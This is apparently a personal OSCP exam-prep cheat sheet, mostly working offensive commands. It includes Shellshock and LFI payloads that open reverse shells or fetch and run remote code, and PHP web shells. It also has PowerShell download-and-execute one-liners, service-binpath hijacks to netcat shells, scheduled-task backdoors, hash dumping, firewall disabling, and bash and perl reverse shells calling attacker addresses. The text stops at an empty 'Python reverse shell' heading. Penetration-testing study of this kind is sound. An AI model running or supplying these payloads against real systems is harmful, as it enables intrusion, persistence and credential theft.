This file contains all the notes I took during my preparation for the OSCP exam.
=================
START FTPD: /etc/init.d/vsftpd start
make dirtycow stable
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
SHELLSHOCK
==========
curl -H 'User-Agent: () { :; }; echo "CVE-2014-6271 vulnerable" bash -c id' http://10.11.1.71/cgi-bin/admin.cgi
nmap 10.11.1.71 -p 80 \
--script=http-shellshock \
--script-args uri=/cgi-bin/test.cgi --script-args uri=/cgi-bin/admin.cgi
./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose
* Shellshock via SSH
ssh -vvv
ssh -i noob noob@$ip '() { :;}; /bin/bash'
* cat file (view file contents)
echo -e "HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () {:;}; echo \\$(</etc/passwd)\\r\\nHost:vulnerable\\r\\nConnection: close\\r\\n\\r\\n" | nc TARGET 80
curl -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/192.168.178.102/9999 0>&1" "http://192.168.178.121:80/cgi-bin/status/"
* Shellshock run bind shell using netcat
echo -e "HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () {:;}; /usr/bin/nc -l -p 9999 -e /bin/sh\\r\\nHost:vulnerable\\r\\nConnection: close\\r\\n\\r\\n" | nc TARGET 80
FTP BOUNCE
==========
-> use ftp bounce attack on 10.11.1.125A to scan ports on 10.11.1.125B
nmap -vvvv -P0 -n -b 10.11.1.125A 10.11.1.125B -p-
Portscan Netcat
===============
nc -nvv -w 1 -z $ip 3388-3390
Temporary Web Server
===================
python -m SimpleHTTPServer
python3 -m http.server
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start"
php -S 0.0.0.0:8888
WEB ENUMERATION
============
* URL Enumeration
gobuster -u http://10.11.1.71/ \
-w /usr/share/seclists/Discovery/Web_Content/common.txt \
-s '200,204,301,302,307,403,500' -e
-s string
Positive status codes (dir mode only) (default "200,204,301,302,307")
if every non-existent URL returns 200 (e.g. a "Try again you N000b" page),
remove 200 from -s
-x for file-extension
-x asp
gobuster -u http://10.11.1.71/ -w /usr/share/seclists/Discovery/Web_Content/cgis.txt -s '200,204,301,302,307,403,500' -e
uniscan -qweds -u <http://vm/>
REVERSE SHELL
=============
* Shellshock
curl -H "User-Agent: () { :; }; /bin/bash -c 'echo aaaa; bash -i >& /dev/tcp/10.11.0.192/443 0>&1; echo zzzz;'" http://10.11.1.71/cgi-bin/admin.cgi -s | sed -n '/aaaa/{:a;n;/zzzz/b;p;ba}'
METASPLOIT
==========
* start up postgresql
systemctl start postgresql
* start up msfdb
msfdb start
* start up msf
msfconsole -q
msf > db_status
[ *] postgresql connected to msf
msf >
searchsploit drupal
searchsploit -x filepath
copy to clipboard the exploit:
searchsploit -p filepath
meterpreter reverse shell
set payload windows/meterpreter/reverse_tcp
PHP Exploitation through LFI
==========================
* Check for LFI Linux:
http://10.11.1.116/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../..//var/log/httpd-error.log
PHP Session Path
/var/tmp/sess_
/tmp/sess_
* Check for LFI Windows:
page=../../../../../../windows/system32/drivers/etc/hosts
cp /opt/powershell/nishang/Shells/Invoke-PowerShellTcp.ps1 shell-9001.ps1
at the bottom:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.0.192 -Port 4444
copy shell-9001 to local web root
<?php system($_REQUEST['PleaseSubscribe']);>
<?php system($_REQUEST['cmd']);>
?PleaseSubscribe="PowerShell IEX(New-Object Net.WebClient).downloadString('http://10.10.0.192/shell-9001.ps1')"
-> IEX download and execute
on a 64-bit Windows machine, replace powershell with
C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe
press CTRL-u for URL code string in burp
- upload to a file this:
-> will download shell to /tmp/ and execute
<?php system("cd /tmp; /usr/local/bin/wget http://10.11.0.192/shell; chmod +x shell; ./shell"); ?>
=> download php-serverse-shell rev.php and copy to dir where rev.php can executed via LFI
<?php system("cd /tmp; /usr/local/bin/wget http://10.11.0.192/c99.php; cp c99.php /usr/local/database/c99.php; "); ?>
<?php system("cd /tmp; /usr/local/bin/wget http://10.11.0.192/rev.php; cp rev.php /usr/local/database/rev.php; "); ?>
<?php system("cd /tmp; /usr/local/bin/wget http://10.11.0.192/rev.php; php /tmp/rev.php "); ?>
... this is useful when you cannot cp into the www-root
.. also, the www-root path may only be known through LFI
=> put a remote file into web-root/myshell from http://10.11.0.192/shell.txt
<?php function dl($u, $o){$c = file_get_contents($u);file_put_contents($o,$c);}dl("http://10.11.0.192/shell.txt",realpath(realpath(dirname(__FILE__)))."/myshell.php")?>
Windows Exploitation through ASP FILE UPLOAD
============================================
* Creating ASP Reverse Meterpreter Shell with msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f asp >reverse.asp
msfvenom -l | grep windows
* start meterpreter handler in msfconsole
use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.11.0.192
LHOST => 10.11.0.192
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.11.0.192
set LPORT 4444
set ExitOnSession false
exploit -j
msf-> session -i 1
Meterpreter Reverse Shellcode
=============================
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/alpha_mixed LHOST=10.11.0.192 LPORT=4444 -f python > shell.py
Windows Privilege Escalation Cheatsheet
=======================================
* Determine Service Pack
Window 2008:
systeminfo
OS Version: 6.1.760 N/A Build 7600
OS Version: 6.1.760 Service Pack 1 Build 7600
Hotfix(s): N/A
Windows XP:
type C:\Windows/system32\eula.txt
type C:\Windows\System32\license.rtf
* Hotfixes installed
dir C:\Windows\SoftwareDistribution\Download\*.* /s
type C:\Windows\WindowsUpdate.log
* List all Documents of all Users
dir /b /ad "C:\Documents and Settings\" /s
* get current windows version
type C:/Windows/system32/eula.txt
* current privileges
whoami /priv Privileges associated with your account
whoami Get current username
* Other logged in Users
qwinsta
* Users on the system
net user
* Groups on the system
net localgroup
* Members of a group
net localgroup "Remote Desktop Users"
* Change password for user Bob
net user Bob *
* Create a user
net user /add [username] [password]
net user /add gamma gamma
* Run cmd.exe as Administrator
runas /savecred /user:administrator cmd
* to Obtain the names of a service.
Syntax: sc query [service name]
Example: sc query wuauserv
sc query state= all
get all non-windows services:
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
-> then check the permissions of the executables with icacls
-> vulnerable if they look like Everyone:(I)(F)
* Running Tasks
tasklist
* Kill a task
taskkill f /pid 7777
taskkill /f /im "Taskmgr.ex"
* start or stop a service
sc start
sc stop
* run command through smb when user/password is known
smbexec.py THINC/gamma:"mypassword"@10.11.118^C
* snmp configuration
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
* UnQuoted Service Paths
wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """
* Permissions
icacls "C:\Example" Print permissions for "Example" directory
accesschk.exe -qwsu "Group" Objects modifiable by "Group" (try "Everyone", "Authenticated Users", and/or "Users")
accesschk.exe -qwsu "Group" Objects modifiable by "Group" (try "Everyone", "Authenticated Users", and/or "Users")
* Find all weak folder permissions per drive.
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
accesschk64.exe -uwdqs Users c:\*.*
* Find all weak file permissions per drive.
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
accesschk64.exe -uwqs Users c:\*.*
accesschk64.exe -uwqs "Authenticated Users" c:\*.*
* Permissions to services
accesschk.exe -ucqv *
accesschk64.exe -ucqv *
accesschk.exe -cuwv "user" *
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
SERVICE_ALL_ACCESS means we have full control over modifying the properties of the PFNet Service
Find weak service:
C:\Users\Public\ccesschk.exe -cuwv "user" *
Start Type is AUTO_START
sc cong blackwinterSrv binpath= "C:\temp_dir\nc.exe -nv 192.168.168.168 443 -e C:\WINDOWS\System32\cmd.exe"
* To see all global objects that Everyone can modify:
accesschk -wuo everyone \basednamedobjects
accesschk64 -wuo everyone \basednamedobjects
* See system log
wevtutil cl System
* XP: add user to Administrators group
net localgroup Administrators Bob /add
* find scheduled tasks
schtasks /query /fo LIST /v
Scheduled Tasks
Here we are looking for tasks that are run by a privileged user, and run a binary that we can overwrite.
schtasks /query /fo LIST /v
This might produce a huge amount of text. I have not been able to figure out how to output just the relevant strings with findstr, so if you know a better way please notify me. For now I just copy the text and paste it into my Linux terminal.
Yeah I know this ain't pretty, but it works. You can of course change the name SYSTEM to another privileged user.
cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
Task scheduled to run when RDP login fails:
SchTasks /Create /RU SYSTEM /SC ONEVENT /MO "*[System[EventID=4625]] and *[EventData[Data='USERNAME_BACKDOOR']]" /EC Security /TN "RDPBackdoor" /TR "C:\PAYLOAD.EXE" /F
schtasks /create /tn "SystemTask" /tr "cmd /C 'PAYLOAD.EXE'" /rl HIGHEST /ru SYSTEM /sc ONSTART
/tn specifies the name of the task
/tr specifies the command to run
/rl specifies run level. I don’t think this is related to Unix run levels, but is instead a privilege thing
/ru the user the payload is run under.
/sc is the frequency. we want it to run when the machine starts up.
* list all services
sc query
* As Admin, create a user that is allowed to use Rdesktop
net user /add gamma gamma
net localgroup "Remote Desktop Users" gamma /add
net localgroup Administrators gamma /add
net localgroup "Backup Operators" gamma /add
* Search for interesting files
dir sysprep.inf /s
dir sysprep.xml /s
dir Unattended.xml /s
dir *.zip /s
dir *.7z /s
findstr /si pass *.xml *.ini *.txt *.config *.cfg *.bat
findstr /si pwd *.xml *.ini *.txt *.config *.cfg *.bat
dir /s *pass* == *cred* == *vnc* == *.config*
dir C:\*vnc.ini /s /b /c
dir C:\ /s /b /c | findstr /sr \*password\*
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
findstr /si password *.xml *.ini *.txt *.config 2>nul
* Query registry
reg query HKLM /f password /t REG_SZ /s
reg query HKLM /f pass /t REG_SZ /s
reg query HKLM /f pwd /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
* Check Credential Store for saved/cached Passwords
cmdkey.exe /list
runas /profile /savecred /user:Administrator <full path of executeable>
dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
* Check if InstallAlwaysElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
msfvemom -f msi -p windows/meterpreter/reverse_tcp
msfvenom -p windows/adduser USER=rottenadmin PASS=xxx -f msi -o rotten.msi
msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\rotten.msi
vulnerable if following output:
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1
A malicious .msi file can be created using msfvenom. Choose a desired payload and use the -f msi flag to set the output format to MSI.
Then the payload can be executed on the vulnerable system using msiexec.
* Check for Unattended install
dir C:\Windows\Panther\
dir C:\Windows\Panther\Unattend\
dir C:\Windows\System32\
dir C:\Windows\System32\sysprep\
dir c:\Unattended.xml /s
dir c:\sysprep.xml /s
dir c:\sysprep.inf /s
* DLL Highjacking
* PowerSploit
* Unquoted Service Path
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
The path for PFNet’s service binary is unquoted and contains spaces.
Metasploit Module: exploit/windows/local/trusted_service_path
* Unattended Installs
https://toshellandback.com/2015/11/24/ms-priv-esc/
-> installations without user interactions containing credentials:
dir c:\Unattend.xml /s
dir c:\sysprep.xml /s
dir c:\sysprep.inf /s
* VNC Password location
RealVNC
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver
Value: Password
Cracking:
root@kali:~/scripts/bruteforce# ./vncpwd/vncpwd /root/vnc_pwd
TightVNC
C:\>reg query HKEY_LOCAL_MACHINE\Software\TightVNC\Server /v Password
HKEY_LOCAL_MACHINE\Software\TightVNC\Server
Password REG_BINARY 2151D3722874AD0C
HKEY_CURRENT_USER\Software\TightVNC\Server
Value: Password or PasswordViewOnly
TigerVNC
HKEY_LOCAL_USER\Software\TigerVNC\WinVNC4
Value: Password
UltraVNC
C:\Program Files\UltraVNC\ultravnc.ini
Value: passwd or passwd2
Read More: https://www.raymond.cc/blog/crack-or-decrypt-vnc-server-encrypted-password/
* Basic Commands
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
hostname
echo %username%
net users
net user user1
* Windows Firewall
Show Config: netsh firewall show config
allow port 3389: netsh firewall add portopening protocol=TCP name=3389 port=3389 mode=ENABLE
Turn Off:
$ netsh firewall set opmode disable
netsh advfirewall set currentprofile state off
* Enable RDP
Enabling RDP
netsh firewall set service RemoteDesktop enable
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurentControlSet\Control\Terminal Server" /v fDenyTSConnections /t
REG_DWORD /d 0 /f
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
sc config TermService start= auto
net start Termservice
netsh.exe
firewall
add portopening TCP 3389 "Remote Desktop"
OR:
netsh.exe advfirewall firewall add rule name="Remote Desktop - User Mode (TCP-In)" dir=in action=allow
program="%%SystemRoot%%\system32\svchost.exe" service="TermService" description="Inbound rule for the
Remote Desktop service to allow RDP traffic. [TCP 3389] added by LogicDaemon's script" enable=yes
profile=private,domain localport=3389 protocol=tcp
netsh.exe advfirewall firewall add rule name="Remote Desktop - User Mode (UDP-In)" dir=in action=allow
program="%%SystemRoot%%\system32\svchost.exe" service="TermService" description="Inbound rule for the
Remote Desktop service to allow RDP traffic. [UDP 3389] added by LogicDaemon's script" enable=yes
profile=private,domain localport=3389 protocol=udp
OR (meterpreter)
run post/windows/manage/enable_rdp
---
* Enable RDP access
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
* Neighbours
ipconfig /displaydns Shows DNS cache
netsh route print Print routing table
* WinXP dump hashes
reg.exe save HKLM\SAM sam
reg.exe save HKLM\SYSTEM sys
samdump2 sys sam
reg.exe save hklm\system c:\temp\system.save
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
* view registry / ntuser.dat
fred
* upload files via ftp: (the FTP server must allow anonymous access)
echo open 10.11.0.192 > ftp.txt
@echo ftp>> ftp.txt
@echo ftp>> ftp.txt
@echo binary>> ftp.txt
@echo GET /nc.exe>> ftp.txt
echo quit >>ftp.txt
ftp -s:ftp.txt -v
* Download from HTTP via Powershell one-liner
(New-Object System.Net.WebClient).DownloadFile("http://host/file","C:\LocalPath") PowerShell one-liner: download a remote file to LocalPath
Invoke-WebRequest "https://myserver/filename" -OutFile "C:\Windows\Temp\filename"
(New-Object System.Net.WebClient).DownloadFile("https://myserver/filename", "C:\Windows\Temp\filename")
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.11.0.192/MS11-040.exe" >>wget.ps1
echo $file = "output-file.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
$secpasswd = ConvertTo-SecureString "aliceishere" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("alice", $secpasswd)
$computer = "10.11.1.49"
[System.Diagnostics.Process]::Start("C:\Users\Public\nc","-e c:\windows\system32\cmd.exe 10.11.0.192 9999", $mycreds.Username, mycreds.Password, $computer)
powershell.exe -ExecutionPolicy Bypass -NoLogo -NoProfile -File wget.ps1
* windows wget alternative
echo Set args = Wscript.Arguments >> webdl.vbs
timeout 1
echo Url = "http://1.1.1.1/windows-privesc-check2.exe" >> webdl.vbs
timeout 1
echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> webdl.vbs
timeout 1
echo dim bStrm: Set bStrm = createobject("Adodb.Stream") >> webdl.vbs
timeout 1
echo xHttp.Open "GET", Url, False >> webdl.vbs
timeout 1
echo xHttp.Send >> webdl.vbs
timeout 1
echo with bStrm >> webdl.vbs
timeout 1
echo .type = 1 ' >> webdl.vbs
timeout 1
echo .open >> webdl.vbs
timeout 1
echo .write xHttp.responseBody >> webdl.vbs
timeout 1
echo .savetofile "C:\temp\windows-privesc-check2.exe", 2 ' >> webdl.vbs
timeout 1
echo end with >> webdl.vbs
timeout 1
echo
The file can be run using the following syntax:
C:\temp\cscript.exe webdl.vbs
* Transfer via SMB
python /usr/local/bin/smbserver.py ROPNOP /oscp/exploit/windows/ms11-046/
impacket-smbserver ROPNOP /oscp/exploit/windows/ms11-046/
copy \\10.11.0.192\ROPNOP\MS11-040.exe
\\10.11.0.192\ROPNOP\MS11-040.exe
* Transfer via Webdav
/root/webdav_start.sh
net use x: http://10.11.0.192/
* Transfer via Certutil
certutil.exe -URL http://10.11.0.192/foobar
foobar is in C:\Users\subTee\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
* tunnel only local reachable ports
plink.exe -v -pw mypassword [email protected] -L 6666:127.0.0.1:445
We set up an SSH tunnel to reach the MySQL server.
We therefore need to tunnel port 3306 over SSH: open an SSH connection to 1.2.3.4 and tunnel port 3306.
plink.exe -v -pw geheim [email protected] -L 6603:localhost:3306
* Compiling C windows exploits on Linux
> i686-w64-mingw32-gcc exploit.c -o exploit #64 Bit > i686-w64-mingw32-gcc 40564.c -o 40564 -lws2_32 #32 Bit
* Windows LOOTING
https://tools.kali.org/password-attacks/creddump
* Run Powershell scripts
MS16-032 https://www.exploit-db.com/exploits/39719/
powershell -ExecutionPolicy ByPass -command "& { . C:\Users\Public\Invoke-MS16-032.ps1; Invoke-MS16-032 }"
powershell -ExecutionPolicy ByPass -command "& { . C:\Users\Bethany\AppData\Local\Temp\Invoke-MS16-032.ps1; Invoke-MS16-032 }"
* Windows compile python to .exe
net use z: \\tsclient\test
code in /root/rdesktopshare
C:\Users\Administrator\Desktop\Tools\python\pyinstaller-2.1\pyInstaller-2.1
C:\Users\Administrator\Desktop\Tools\python\pyinstaller-2.1\pyInstaller-2.1>c:\Python27\python.exe pyinstaller.py --onefile z:\ms14-058.py
wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile HelloWorld.py
* Powershell RunAS
working:
echo $username = 'ftp' > runas.ps1
echo $securePassword = ConvertTo-SecureString "foobar23" -AsPlainText -Force >> runas.ps1
echo $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword >> runas.ps1
echo $script = 'c:\windows\system32\cmd.exe' >> runas.ps1
echo Start-Process -WorkingDirectory 'C:\Windows\System32' -FilePath $script -Credential $credential >> runas.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File runas.ps1
* Powershell reverse Netcat shell in C:\Users\Public\nc.exe with user ftp/foobar23
echo $username = 'ftp' > rev.ps1
echo $securePassword = ConvertTo-SecureString "foobar23" -AsPlainText -Force >> rev.ps1
echo $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword >> rev.ps1
echo $script= 'C:\Users\Public\nc.exe' >> rev.ps1
echo Start-Process -WorkingDirectory 'C:\Users\Public\' -FilePath $script -ArgumentList ‘-e cmd.exe 10.11.0.192 9999’ -Credential $credential >> rev.ps1
echo $username = 'alice' > runas.ps1
echo $securePassword = ConvertTo-SecureString "aliceishere" -AsPlainText -Force >> runas.ps1
echo $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword >> runas.ps1
echo Start-Process C:\Windows\System32\cmd.exe -Credential $credential >> runas.ps1
Using Powershell to RunAs an administrative user:
echo $secpasswd = ConvertTo-SecureString "password" -AsPlainText -Force > run.ps1
echo $mycreds = New-Object System.Management.Automation.PSCredential ("admin", $secpasswd) >> run.ps1
echo $computer = "DANCING-PARROT" >> run.ps1
echo [System.Diagnostics.Process]::Start("C:\xampp\webdav\rev.exe","", >> run.ps1
echo $mycreds.Username, $mycreds.Password, $computer) >> run.ps1
powershell -ExecutionPolicy Bypass -File run.ps1
echo $username = ‘alice‘ > startprocess.ps1
echo $password = ‘aliceishere‘ >> startprocess.ps1
echo $securePassword = ConvertTo-SecureString $password -AsPlainText -Force >> startprocess.ps1
echo $credential = New-Object System.Management.Automation.PSCredential $username, $securepassword >> startprocess.ps1
echo Start-Process ‘C:\Users\Public\nc.exe’ -ArgumentList ‘-e cmd.exe 10.11.0.192 9999’ -Credential $credential >> startprocess.ps1
* Windows helpers
useradd.c
* Windows - Add user.
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */
/*
 * Runs "net user ... /add" followed by "net localgroup administrators ... /add"
 * through the shell via system(). The <username> and <password> placeholders
 * inside the string literal must be replaced before compiling. The exit
 * status of system() is stored in i but never inspected, so a failed command
 * goes unreported and main() always returns 0.
 */
int main ()
{
int i;
i=system ("net user <username> <password> /add && net localgroup administrators <username> /add");
return 0;
}
# Compile
i686-w64-mingw32-gcc -o useradd.exe useradd.c
SUID
* Set owner user ID.
/*
 * Per the "SUID" heading above, this is meant to be compiled and run as a
 * setuid binary: it sets the real, effective and saved user IDs to 0 and
 * then starts an interactive bash through system(). No headers are included,
 * so setresuid() and system() rely on implicit declarations (recent compilers
 * reject this), and neither call's return value is checked — if setresuid()
 * fails the shell still starts, just without elevated IDs.
 */
int main(void){
setresuid(0, 0, 0);
system("/bin/bash");
}
# Compile
gcc suid.c -o suid
Powershell Run as
* Run file as another user with powershell.
echo $username = '<username>' > runas.ps1
echo $securePassword = ConvertTo-SecureString "<password>" -AsPlainText -Force >> runas.ps1
echo $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword >> runas.ps1
echo Start-Process C:\Users\User\AppData\Local\Temp\backdoor.exe -Credential $credential >> runas.ps1
Process Monitor
* Monitor processes to check for running cron jobs.
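#!/bin/bash
# Process monitor: samples the process table repeatedly and prints the
# command lines that appeared (">") or disappeared ("<") since the previous
# sample, which makes periodically scheduled jobs (e.g. cron) visible.
# Runs until interrupted. Optional $1 is the poll interval in seconds
# (default 1, matching the original hard-coded sleep).
interval=${1:-1}
old_process=$(ps -eo command)
while true; do
  new_process=$(ps -eo command)
  # printf instead of echo so command lines are passed through verbatim;
  # the grep pattern is quoted so the shell cannot glob-expand it against
  # files named "<" or ">" in the current directory.
  diff <(printf '%s\n' "$old_process") <(printf '%s\n' "$new_process") | grep '[<>]'
  sleep "$interval"
  old_process=$new_process
done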
* Powershell Empire
in empire:
listeners
uselistener http
set Host http://10.10.14.30:443
set Port 443
execute
launcher powershell
copy output to a file empire.ps1 serving on local apache
in burp:
.. downloadString('.../empire.ps1
in empire:
interact agentid
searchmode PowerUp
usermodule privesc/powerup/allchecks
info
execute
* PowerUp.ps1
add the end: Invoke-AllChecks
when having code execution via .asp/.php/...
?fexec = echo "IEX(New-Object Net.WebClient).DownloadString('http://myip/PowerUp.ps') | powershell -noprofile -
* Sherlock
Sherlock.ps1
grep -i function Sherlock.ps1
Find-AllVulns
at the end append: Find-AllVulns
* Check if OS is 64bit
Powershell.exe
[environment]::Is64BitOperatingSystem
* Check if current process is a 64bit Process
[environment]::Is64BitProcess
Directories
SysWOW64 64bit Applications available to 32bit Applications through emulation
SysNative -> 64bit processes live here
* when running 32bit app on a 64bit OS
Powershell.exe -> C:\Windows\SysNative\WindowsPowerShell\v1.0\Powershell
WIN XP SP0/SP1 local privilege escalation
================================
sc config upnphost binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
nc -lvp 9988
net start upnphost
#list properties
sc qc "Vulnerable Service"
# check privileges
sc qprivs "Service name"
net user /add gamma gamma
sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 192.168.1.101 6666 -e c:\Windows\system32\cmd.exe"
sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.0.192 6666 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc config upnphost depend= ""
LINUX PRIVILEGE ESCALATION
===========================
* What files run as root / SUID / SGID?:
find / -perm +2000 -user root -type f -print
find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
* What folders are world writeable?:
find / -writable -type d 2>/dev/null # world-writeable folders
find / -perm -222 -type d 2>/dev/null # world-writeable folders
find / -perm -o w -type d 2>/dev/null # world-writeable folders
find / -perm -o x -type d 2>/dev/null # world-executable folders
find / \( -perm -o w -perm -o x \) -type d 2>/dev/null # world-writeable & executable folders
SHELL SPAWNING
==============
python -c 'import pty; pty.spawn("/bin/sh")'
CTRL-Z
stty raw -echo
fg
stty size
stty -rows 48 -columns 120
echo os.system('/bin/bash')
/bin/sh -i
perl —e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
(From within IRB)
exec "/bin/sh"
(From within vi)
:!bash
(From within vi)
:set shell=/bin/bash:shell
(From within nmap)
!sh
(from man page)
!/bin/sh
Interesting Files for Dirbuster Bruteforcing:
==============
mbox.bz2
mbox
WWW Directory enumeration
--------------------------
dirb http://10.11.1.72 /usr/share/wordlists/dirb/small.txt -x extensions_common.txt
based on Web Application:
/usr/share/seclists/Discovery/Web-Content
Windows SMB enumeration
-----------------------
* enum4linux -a <host>
* ms08-67
nmap -sU -sS --script smb-vuln-ms08-067.nse -p U:137,T:139 10.11.1.5
* os detection
nmap -v -p 139, 445 --script=smb-os-discovery 10.11.1.227
* smb security mode
nmap -v -p 139, 445 --script=smb-security-mode 10.11.1.236
* some checks
nmap -vvv -sU -sS --script smb-enum-users,smb-enum-shares,smb-os-discovery,smb-protocols,smb-security-mode,smb-system-info,smb2-capabilities,smb2-security-mode,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-vuln-ms10-061 –script-args=unsafe=1 -p U:1^C,T:139 10.11.1.5
SMB Enumeration
SMB OS Discovery
nmap $ip --script smb-os-discovery.nse
Nmap port scan
nmap -v -p 139,445 -oG smb.txt $ip-254
Netbios Information Scanning
nbtscan -r $ip/24
Nmap find exposed Netbios servers
nmap -sU --script nbstat.nse -p 137 $ip
Nmap all SMB scripts scan
nmap -sV -Pn -vv -p 445 --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip
Nmap all SMB scripts authenticated scan
nmap -sV -Pn -vv -p 445 --script-args smbuser=<username>,smbpass=<password> --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip
SMB Enumeration Tools
nmblookup -A $ip
smbclient //MOUNT/share -I $ip -N
rpcclient -U "" $ip
enum4linux $ip
enum4linux -a $ip
SMB Finger Printing
smbclient -L //$ip
Nmap Scan for Open SMB Shares
nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.10.0/24
Nmap scans for vulnerable SMB Servers
nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 $ip
Nmap List all SMB scripts installed
ls -l /usr/share/nmap/scripts/smb*
Enumerate SMB Users
nmap -sU -sS --script=smb-enum-users -p U:137,T:139 $ip-14
OR
python /usr/share/doc/python-impacket-doc/examples /samrdump.py $ip
RID Cycling - Null Sessions
ridenum.py $ip 500 50000 dict.txt
Manual Null Session Testing
Windows: net use \\$ip\IPC$ "" /u:""
Linux: smbclient -L //$ip
Port Scan
==========
* TCP portscan using netcat
nc -nvv -w 1 -z 10.0.0.19 3388-3390
* UDP portscan using netcat
nc -u -nvv -w 1 -z 10.0.0.19 3388-3390
* Ping sweep
nmap -sn 10.11.1.1-254
Compile exploit
==============
gcc -Wl,--hash-style=both -o sock sockpage.c
Reverse Shell Cheat Sheet
========================
* Bash reverse shell
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
bash -i >& /dev/tcp/192.168.178.102/5555 0>&1
* Bash Reverse Shell
exec 5<>/dev/tcp/attackerip/4444
exec 5<>/dev/tcp/192.168.178.102/9999
cat <&5 | while read line; do $line 2>&5 >&5; done # or:
while read line 0<&5; do $line 2>&5 >&5; done
* Perl reverse Shell
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
* Perl reverse shell
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
* Python reverse shell
